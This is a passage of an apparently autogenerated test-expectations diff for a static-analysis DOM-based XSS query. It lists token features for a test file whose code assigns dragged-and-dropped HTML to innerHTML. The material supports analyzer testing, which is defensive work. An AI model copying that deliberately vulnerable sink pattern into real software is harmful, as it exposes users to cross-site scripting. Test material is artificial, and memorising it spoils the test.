drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13561,12 +100560,103 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:44:48:48 | 'div' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:44:48:48 | 'div' | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:44:48:48 | 'div' | receiverName | document | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:49:13:49:16 | html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:49:13:49:16 | html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:49:13:49:16 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:49:13:49:16 | html | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:49:13:49:16 | html | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:49:13:49:16 | html | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:49:13:49:16 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:49:13:49:16 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:49:13:49:16 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:49:13:49:16 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:13:50:15 | div | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:13:50:15 | div | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:13:50:15 | div | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:13:50:15 | div | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:13:50:15 | div | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:13:50:25 | div.innerHTML | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:13:50:25 | div.innerHTML | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:13:50:25 | div.innerHTML | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:13:50:25 | div.innerHTML | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:13:50:25 | div.innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:13:50:32 | div.innerHTML = html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:13:50:32 | div.innerHTML = html | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:13:50:32 | div.innerHTML = html | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:13:50:32 | div.innerHTML = html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:13:50:32 | div.innerHTML = html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:17:50:25 | innerHTML | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:17:50:25 | innerHTML | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:17:50:25 | innerHTML | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:17:50:25 | innerHTML | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:17:50:25 | innerHTML | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:29:50:32 | html | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:29:50:32 | html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:29:50:32 | html | contextSurroundingFunctionParameters | ()\n(e) | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:29:50:32 | html | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:29:50:32 | html | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:50:29:50:32 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:13:52:15 | div | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:13:52:15 | div | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:13:52:15 | div | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:13:52:15 | div | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:13:52:15 | div | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:13:52:27 | div.textContent | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:13:52:27 | div.textContent | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:13:52:27 | div.textContent | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:13:52:27 | div.textContent | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:13:52:27 | div.textContent | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:13:52:34 | div.tex ... = text | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:13:52:34 | div.tex ... = text | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:13:52:34 | div.tex ... = text | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:13:52:34 | div.tex ... = text | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:13:52:34 | div.tex ... = text | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:17:52:27 | textContent | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:17:52:27 | textContent | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:17:52:27 | textContent | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:17:52:27 | textContent | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:17:52:27 | textContent | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:31:52:34 | text | assignedToPropName | textContent | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:31:52:34 | text | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:31:52:34 | text | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:31:52:34 | text | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:31:52:34 | text | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:52:31:52:34 | text | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:16 | document | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:16 | document | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:16 | document | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:16 | document | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:16 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:21 | document.body | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:21 | document.body | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:21 | document.body | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:21 | document.body | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:21 | document.body | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:28 | document.body.append | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:28 | document.body.append | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:28 | document.body.append | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:28 | document.body.append | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:28 | document.body.append | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:33 | documen ... nd(div) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:33 | documen ... nd(div) | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:33 | documen ... nd(div) | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:33 | documen ... nd(div) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:33 | documen ... nd(div) | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:33 | exceptional return of documen ... nd(div) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:33 | exceptional return of documen ... nd(div) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:33 | exceptional return of documen ... nd(div) | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:33 | exceptional return of documen ... nd(div) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:9:54:33 | exceptional return of documen ... nd(div) | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:18:54:21 | body | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:18:54:21 | body | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:18:54:21 | body | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:18:54:21 | body | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:18:54:21 | body | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:23:54:28 | append | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:23:54:28 | append | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:23:54:28 | append | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:23:54:28 | append | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:23:54:28 | append | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:30:54:32 | div | CalleeFlexibleAccessPath | document.body.append | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:30:54:32 | div | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:30:54:32 | div | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13574,11 +100664,292 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:30:54:32 | div | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:30:54:32 | div | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:54:30:54:32 | div | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:1:58:0 | this | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:1:58:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:1:58:0 | this | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:1:58:0 | this | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:1:58:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:1:89:3 | 'arguments' object of function getDropData | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:1:89:3 | 'arguments' object of function getDropData | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:1:89:3 | 'arguments' object of function getDropData | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:1:89:3 | 'arguments' object of function getDropData | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:1:89:3 | 'arguments' object of function getDropData | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:1:89:3 | async f ... ms;\\n } | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:1:89:3 | async f ... ms;\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:1:89:3 | async f ... ms;\\n } | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:1:89:3 | exceptional return of function getDropData | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:1:89:3 | exceptional return of function getDropData | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:1:89:3 | exceptional return of function getDropData | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:1:89:3 | exceptional return of function getDropData | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:1:89:3 | exceptional return of function getDropData | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:1:89:3 | return of function getDropData | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:1:89:3 | return of function getDropData | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:1:89:3 | return of function getDropData | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:1:89:3 | return of function getDropData | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:1:89:3 | return of function getDropData | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:16:58:26 | getDropData | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:16:58:26 | getDropData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:16:58:26 | getDropData | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:28:58:28 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:28:58:28 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:28:58:28 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:28:58:28 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:28:58:28 | e | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:28:58:28 | e | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:28:58:28 | e | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:28:58:28 | e | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:28:58:28 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:58:28:58:28 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:11:60:19 | dropItems | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:11:60:19 | dropItems | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:11:60:19 | dropItems | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:11:60:19 | dropItems | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:11:60:19 | dropItems | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:11:60:46 | dropIte ... ring>() | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:11:60:46 | dropIte ... ring>() | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:11:60:46 | dropIte ... ring>() | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:11:60:46 | dropIte ... ring>() | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:11:60:46 | dropIte ... ring>() | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:11:60:46 | dropItems | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:11:60:46 | dropItems | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:11:60:46 | dropItems | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:11:60:46 | dropItems | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:11:60:46 | dropItems | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:23:60:46 | exceptional return of new Set ... ring>() | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:23:60:46 | exceptional return of new Set ... ring>() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:23:60:46 | exceptional return of new Set ... ring>() | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:23:60:46 | exceptional return of new Set ... ring>() | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:23:60:46 | exceptional return of new Set ... ring>() | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:23:60:46 | new Set ... ring>() | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:23:60:46 | new Set ... ring>() | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:23:60:46 | new Set ... ring>() | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:23:60:46 | new Set ... ring>() | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:23:60:46 | new Set ... ring>() | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:27:60:29 | Set | contextFunctionInterfaces | 